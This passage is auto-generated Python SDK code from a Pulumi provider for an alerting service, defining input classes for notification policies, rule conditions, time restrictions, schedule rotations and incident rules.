Until what minute on `until_hour` notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
"""
return pulumi.get(self, "until_minute")
@until_minute.setter
def until_minute(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "until_minute", value)
@pulumi.input_type
class NotificationPolicyDelayActionDurationArgs:
def __init__(__self__, *,
time_amount: pulumi.Input[int],
time_unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
:param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
pulumi.set(__self__, "time_amount", time_amount)
if time_unit is not None:
pulumi.set(__self__, "time_unit", time_unit)
@property
@pulumi.getter(name="timeAmount")
def time_amount(self) -> pulumi.Input[int]:
"""
A amount of time in `time_units`. This is a integer attribute.
"""
return pulumi.get(self, "time_amount")
@time_amount.setter
def time_amount(self, value: pulumi.Input[int]):
pulumi.set(self, "time_amount", value)
@property
@pulumi.getter(name="timeUnit")
def time_unit(self) -> Optional[pulumi.Input[str]]:
"""
Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
return pulumi.get(self, "time_unit")
@time_unit.setter
def time_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyFilterArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]] conditions: Conditions applied to filter. This is a block, structure is documented below.
:param pulumi.Input[str] type: Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]]:
"""
Conditions applied to filter. This is a block, structure is documented below.
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class NotificationPolicyFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
:param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
:param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
:param pulumi.Input[str] key: If `field` is set as extra-properties, key could be used for key-value pair
:param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
:param pulumi.Input[int] order: Order of the condition in conditions list
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
"""
Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
"""
It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
"""
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
"""
User defined value that will be compared with alert field according to the operation. Default: empty string
"""
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
If `field` is set as extra-properties, key could be used for key-value pair
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates behaviour of the given operation. Default: `false`
"""
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Order of the condition in conditions list
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class NotificationPolicyTimeRestrictionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]] = None):
"""
:param pulumi.Input[str] type: Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]] restrictions: List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
"""
pulumi.set(__self__, "type", type)
if restrictions is not None:
pulumi.set(__self__, "restrictions", restrictions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Defines if restriction should apply daily on given hours or on certain days and hours. Possible values are: `time-of-day`, `weekday-and-time-of-day`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]]:
"""
List of days and hours definitions for field type = `weekday-and-time-of-day`. This is a block, structure is documented below.
"""
return pulumi.get(self, "restrictions")
@restrictions.setter
def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restrictions", value)
@pulumi.input_type
class NotificationPolicyTimeRestrictionRestrictionArgs:
def __init__(__self__, *,
end_day: pulumi.Input[str],
end_hour: pulumi.Input[int],
end_min: pulumi.Input[int],
start_day: pulumi.Input[str],
start_hour: pulumi.Input[int],
start_min: pulumi.Input[int]):
"""
:param pulumi.Input[str] end_day: Ending day of restriction (eg. `wednesday`)
:param pulumi.Input[int] end_hour: Ending hour of restriction.
:param pulumi.Input[int] end_min: Ending minute of restriction on defined `end_hour`
:param pulumi.Input[str] start_day: Starting day of restriction (eg. `monday`)
:param pulumi.Input[int] start_hour: Starting hour of restriction.
:param pulumi.Input[int] start_min: Staring minute of restriction on defined `start_hour`
"""
pulumi.set(__self__, "end_day", end_day)
pulumi.set(__self__, "end_hour", end_hour)
pulumi.set(__self__, "end_min", end_min)
pulumi.set(__self__, "start_day", start_day)
pulumi.set(__self__, "start_hour", start_hour)
pulumi.set(__self__, "start_min", start_min)
@property
@pulumi.getter(name="endDay")
def end_day(self) -> pulumi.Input[str]:
"""
Ending day of restriction (eg. `wednesday`)
"""
return pulumi.get(self, "end_day")
@end_day.setter
def end_day(self, value: pulumi.Input[str]):
pulumi.set(self, "end_day", value)
@property
@pulumi.getter(name="endHour")
def end_hour(self) -> pulumi.Input[int]:
"""
Ending hour of restriction.
"""
return pulumi.get(self, "end_hour")
@end_hour.setter
def end_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "end_hour", value)
@property
@pulumi.getter(name="endMin")
def end_min(self) -> pulumi.Input[int]:
"""
Ending minute of restriction on defined `end_hour`
"""
return pulumi.get(self, "end_min")
@end_min.setter
def end_min(self, value: pulumi.Input[int]):
pulumi.set(self, "end_min", value)
@property
@pulumi.getter(name="startDay")
def start_day(self) -> pulumi.Input[str]:
"""
Starting day of restriction (eg. `monday`)
"""
return pulumi.get(self, "start_day")
@start_day.setter
def start_day(self, value: pulumi.Input[str]):
pulumi.set(self, "start_day", value)
@property
@pulumi.getter(name="startHour")
def start_hour(self) -> pulumi.Input[int]:
"""
Starting hour of restriction.
"""
return pulumi.get(self, "start_hour")
@start_hour.setter
def start_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "start_hour", value)
@property
@pulumi.getter(name="startMin")
def start_min(self) -> pulumi.Input[int]:
"""
Staring minute of restriction on defined `start_hour`
"""
return pulumi.get(self, "start_min")
@start_min.setter
def start_min(self, value: pulumi.Input[int]):
pulumi.set(self, "start_min", value)
@pulumi.input_type
class NotificationRuleCriteriaArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
:param pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]] conditions: Defines the fields and values when the condition applies
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]]:
"""
Defines the fields and values when the condition applies
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleCriteriaConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class NotificationRuleCriteriaConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] field: Possible values: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
:param pulumi.Input[str] operation: Possible values: `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`
:param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
:param pulumi.Input[str] key: If 'field' is set as 'extra-properties', key could be used for key-value pair
:param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: `false`
:param pulumi.Input[int] order: Order of the condition in conditions list
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
"""
Possible values: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
"""
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
"""
Possible values: `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`
"""
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
"""
User defined value that will be compared with alert field according to the operation. Default: empty string
"""
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
If 'field' is set as 'extra-properties', key could be used for key-value pair
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates behaviour of the given operation. Default: `false`
"""
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Order of the condition in conditions list
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class NotificationRuleRepeatArgs:
def __init__(__self__, *,
loop_after: pulumi.Input[int],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] enabled: Defined if this step is enabled. Default: `true`
"""
pulumi.set(__self__, "loop_after", loop_after)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter(name="loopAfter")
def loop_after(self) -> pulumi.Input[int]:
return pulumi.get(self, "loop_after")
@loop_after.setter
def loop_after(self, value: pulumi.Input[int]):
pulumi.set(self, "loop_after", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Defined if this step is enabled. Default: `true`
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class NotificationRuleScheduleArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
type: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: Name of the notification policy
:param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the notification policy
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class NotificationRuleStepArgs:
def __init__(__self__, *,
contacts: pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]],
enabled: Optional[pulumi.Input[bool]] = None,
send_after: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]] contacts: Defines the contact that notification will be sent to. This is a block, structure is documented below.
:param pulumi.Input[bool] enabled: Defined if this step is enabled. Default: `true`
:param pulumi.Input[int] send_after: Time period, in minutes, notification will be sent after.
"""
pulumi.set(__self__, "contacts", contacts)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if send_after is not None:
pulumi.set(__self__, "send_after", send_after)
@property
@pulumi.getter
def contacts(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]]:
"""
Defines the contact that notification will be sent to. This is a block, structure is documented below.
"""
return pulumi.get(self, "contacts")
@contacts.setter
def contacts(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationRuleStepContactArgs']]]):
pulumi.set(self, "contacts", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Defined if this step is enabled. Default: `true`
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="sendAfter")
def send_after(self) -> Optional[pulumi.Input[int]]:
"""
Time period, in minutes, notification will be sent after.
"""
return pulumi.get(self, "send_after")
@send_after.setter
def send_after(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "send_after", value)
@pulumi.input_type
class NotificationRuleStepContactArgs:
def __init__(__self__, *,
method: pulumi.Input[str],
to: pulumi.Input[str]):
"""
:param pulumi.Input[str] method: Contact method. Possible values: `email`, `sms`, `voice`, `mobile`
:param pulumi.Input[str] to: Address of a given method (eg. email address for `email`, phone number for `sms`/`voice` or mobile application name for `mobile`)
"""
pulumi.set(__self__, "method", method)
pulumi.set(__self__, "to", to)
@property
@pulumi.getter
def method(self) -> pulumi.Input[str]:
"""
Contact method. Possible values: `email`, `sms`, `voice`, `mobile`
"""
return pulumi.get(self, "method")
@method.setter
def method(self, value: pulumi.Input[str]):
pulumi.set(self, "method", value)
@property
@pulumi.getter
def to(self) -> pulumi.Input[str]:
"""
Address of a given method (eg. email address for `email`, phone number for `sms`/`voice` or mobile application name for `mobile`)
"""
return pulumi.get(self, "to")
@to.setter
def to(self, value: pulumi.Input[str]):
pulumi.set(self, "to", value)
@pulumi.input_type
class NotificationRuleTimeRestrictionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]] = None):
"""
:param pulumi.Input[str] type: Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
"""
pulumi.set(__self__, "type", type)
if restrictions is not None:
pulumi.set(__self__, "restrictions", restrictions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Kind of matching filter. Possible values: `match-all`, `match-any-condition`, `match-all-conditions`
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]]:
return pulumi.get(self, "restrictions")
@restrictions.setter
def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationRuleTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restrictions", value)
@pulumi.input_type
class NotificationRuleTimeRestrictionRestrictionArgs:
def __init__(__self__, *,
end_day: pulumi.Input[str],
end_hour: pulumi.Input[int],
end_min: pulumi.Input[int],
start_day: pulumi.Input[str],
start_hour: pulumi.Input[int],
start_min: pulumi.Input[int]):
pulumi.set(__self__, "end_day", end_day)
pulumi.set(__self__, "end_hour", end_hour)
pulumi.set(__self__, "end_min", end_min)
pulumi.set(__self__, "start_day", start_day)
pulumi.set(__self__, "start_hour", start_hour)
pulumi.set(__self__, "start_min", start_min)
@property
@pulumi.getter(name="endDay")
def end_day(self) -> pulumi.Input[str]:
return pulumi.get(self, "end_day")
@end_day.setter
def end_day(self, value: pulumi.Input[str]):
pulumi.set(self, "end_day", value)
@property
@pulumi.getter(name="endHour")
def end_hour(self) -> pulumi.Input[int]:
return pulumi.get(self, "end_hour")
@end_hour.setter
def end_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "end_hour", value)
@property
@pulumi.getter(name="endMin")
def end_min(self) -> pulumi.Input[int]:
return pulumi.get(self, "end_min")
@end_min.setter
def end_min(self, value: pulumi.Input[int]):
pulumi.set(self, "end_min", value)
@property
@pulumi.getter(name="startDay")
def start_day(self) -> pulumi.Input[str]:
return pulumi.get(self, "start_day")
@start_day.setter
def start_day(self, value: pulumi.Input[str]):
pulumi.set(self, "start_day", value)
@property
@pulumi.getter(name="startHour")
def start_hour(self) -> pulumi.Input[int]:
return pulumi.get(self, "start_hour")
@start_hour.setter
def start_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "start_hour", value)
@property
@pulumi.getter(name="startMin")
def start_min(self) -> pulumi.Input[int]:
return pulumi.get(self, "start_min")
@start_min.setter
def start_min(self, value: pulumi.Input[int]):
pulumi.set(self, "start_min", value)
@pulumi.input_type
class ScheduleRotationParticipantArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: The responder type.
:param pulumi.Input[str] id: The id of the responder.
"""
pulumi.set(__self__, "type", type)
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the responder.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class ScheduleRotationTimeRestrictionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
restriction: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]] = None,
restrictions: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]] = None):
"""
:param pulumi.Input[str] type: This parameter should be set to `time-of-day` or `weekday-and-time-of-day`.
:param pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]] restriction: It is a restriction object which is described below. In this case startDay/endDay fields are not supported. This can be used only if time restriction type is `time-of-day`.
:param pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]] restrictions: It is a restriction object which is described below. This can be used only if time restriction type is `weekday-and-time-of-day`.
"""
pulumi.set(__self__, "type", type)
if restriction is not None:
pulumi.set(__self__, "restriction", restriction)
if restrictions is not None:
pulumi.set(__self__, "restrictions", restrictions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
This parameter should be set to `time-of-day` or `weekday-and-time-of-day`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def restriction(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]:
"""
It is a restriction object which is described below. In this case startDay/endDay fields are not supported. This can be used only if time restriction type is `time-of-day`.
"""
return pulumi.get(self, "restriction")
@restriction.setter
def restriction(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restriction", value)
@property
@pulumi.getter
def restrictions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]:
"""
It is a restriction object which is described below. This can be used only if time restriction type is `weekday-and-time-of-day`.
"""
return pulumi.get(self, "restrictions")
@restrictions.setter
def restrictions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ScheduleRotationTimeRestrictionRestrictionArgs']]]]):
pulumi.set(self, "restrictions", value)
@pulumi.input_type
class ScheduleRotationTimeRestrictionRestrictionArgs:
def __init__(__self__, *,
end_day: pulumi.Input[str],
end_hour: pulumi.Input[int],
end_min: pulumi.Input[int],
start_day: pulumi.Input[str],
start_hour: pulumi.Input[int],
start_min: pulumi.Input[int]):
"""
:param pulumi.Input[str] end_day: Value of the day that frame will end.
:param pulumi.Input[int] end_hour: Value of the hour that frame will end.
:param pulumi.Input[int] end_min: Value of the minute that frame will end. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
:param pulumi.Input[str] start_day: Value of the day that frame will start.
:param pulumi.Input[int] start_hour: Value of the hour that frame will start
:param pulumi.Input[int] start_min: Value of the minute that frame will start. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
"""
pulumi.set(__self__, "end_day", end_day)
pulumi.set(__self__, "end_hour", end_hour)
pulumi.set(__self__, "end_min", end_min)
pulumi.set(__self__, "start_day", start_day)
pulumi.set(__self__, "start_hour", start_hour)
pulumi.set(__self__, "start_min", start_min)
@property
@pulumi.getter(name="endDay")
def end_day(self) -> pulumi.Input[str]:
"""
Value of the day that frame will end.
"""
return pulumi.get(self, "end_day")
@end_day.setter
def end_day(self, value: pulumi.Input[str]):
pulumi.set(self, "end_day", value)
@property
@pulumi.getter(name="endHour")
def end_hour(self) -> pulumi.Input[int]:
"""
Value of the hour that frame will end.
"""
return pulumi.get(self, "end_hour")
@end_hour.setter
def end_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "end_hour", value)
@property
@pulumi.getter(name="endMin")
def end_min(self) -> pulumi.Input[int]:
"""
Value of the minute that frame will end. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
"""
return pulumi.get(self, "end_min")
@end_min.setter
def end_min(self, value: pulumi.Input[int]):
pulumi.set(self, "end_min", value)
@property
@pulumi.getter(name="startDay")
def start_day(self) -> pulumi.Input[str]:
"""
Value of the day that frame will start.
"""
return pulumi.get(self, "start_day")
@start_day.setter
def start_day(self, value: pulumi.Input[str]):
pulumi.set(self, "start_day", value)
@property
@pulumi.getter(name="startHour")
def start_hour(self) -> pulumi.Input[int]:
"""
Value of the hour that frame will start
"""
return pulumi.get(self, "start_hour")
@start_hour.setter
def start_hour(self, value: pulumi.Input[int]):
pulumi.set(self, "start_hour", value)
@property
@pulumi.getter(name="startMin")
def start_min(self) -> pulumi.Input[int]:
"""
Value of the minute that frame will start. Minutes may take 0 or 30 as value. Otherwise they will be converted to nearest 0 or 30 automatically.
"""
return pulumi.get(self, "start_min")
@start_min.setter
def start_min(self, value: pulumi.Input[int]):
pulumi.set(self, "start_min", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleArgs:
def __init__(__self__, *,
incident_properties: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]],
condition_match_type: Optional[pulumi.Input[str]] = None,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]] incident_properties: Properties for incident rule. This is a block, structure is documented below.
:param pulumi.Input[str] condition_match_type: A Condition type, supported types are: `match-all`, `match-any-condition`, `match-all-conditions`. Default: `match-all`
:param pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]] conditions: Conditions applied to incident. This is a block, structure is documented below.
"""
pulumi.set(__self__, "incident_properties", incident_properties)
if condition_match_type is not None:
pulumi.set(__self__, "condition_match_type", condition_match_type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter(name="incidentProperties")
def incident_properties(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]]:
"""
Properties for incident rule. This is a block, structure is documented below.
"""
return pulumi.get(self, "incident_properties")
@incident_properties.setter
def incident_properties(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleIncidentPropertyArgs']]]):
pulumi.set(self, "incident_properties", value)
@property
@pulumi.getter(name="conditionMatchType")
def condition_match_type(self) -> Optional[pulumi.Input[str]]:
"""
A Condition type, supported types are: `match-all`, `match-any-condition`, `match-all-conditions`. Default: `match-all`
"""
return pulumi.get(self, "condition_match_type")
@condition_match_type.setter
def condition_match_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "condition_match_type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]]:
"""
Conditions applied to incident. This is a block, structure is documented below.
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceIncidentRuleIncidentRuleConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class ServiceIncidentRuleIncidentRuleConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] field: Specifies which alert field will be used in condition. Possible values are `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`
:param pulumi.Input[str] operation: It is the operation that will be executed for the given field and key. Possible operations are `matches`, `contains`, `starts-with`, `ends-with`, `equals`, `contains-key`, `contains-value`, `greater-than`, `less-than`, `is-empty`, `equals-ignore-whitespace`.
:param pulumi.Input[str] expected_value: User defined value that will be compared with alert field according to the operation. Default: empty string
:param pulumi.Input[bool] not_: Indicates behaviour of the given operation. Default: false
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
"""
